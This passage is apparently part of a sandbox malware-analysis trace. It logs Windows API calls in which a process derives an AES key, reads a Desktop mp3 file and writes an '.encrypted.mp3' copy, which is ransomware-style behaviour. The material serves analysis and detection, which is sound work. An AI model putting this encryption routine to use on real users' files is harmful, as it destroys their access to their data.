wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.129] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.129] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.129] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.129] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.129] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.129] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.129] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.129] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0030.129] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.129] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.129] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.130] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.130] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.130] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.130] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.130] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.130] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.130] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.130] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.130] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.130] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.130] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.130] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.130] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.130] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0030.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.131] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.131] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.131] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.131] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0030.131] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.131] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0030.132] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.132] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0030.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.132] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.132] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0030.132] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.132] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.132] CryptDestroyHash (hHash=0x7c2100) returned 1 [0030.132] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxptuwejz.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.132] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.132] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0030.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0030.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.133] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.encrypted.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxptuwejz.encrypted.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0030.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0030.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0030.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.134] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0030.134] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x9dab, lpOverlapped=0x0) returned 1 [0030.135] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0030.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9dab) returned 0x8affc0 [0030.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0030.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0030.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9dab) returned 0x8b9d78 [0030.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0030.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.136] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0030.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0030.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0030.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0030.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9dab) returned 0x8affc0 [0030.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0030.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0030.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889aa8 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0030.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9dab) returned 0x8c3b30 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.138] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0030.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da238 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8895c8 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.139] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0030.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0030.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0030.139] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0030.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0030.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.139] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0030.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.140] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.140] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0030.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.140] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.141] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.141] HeapFree 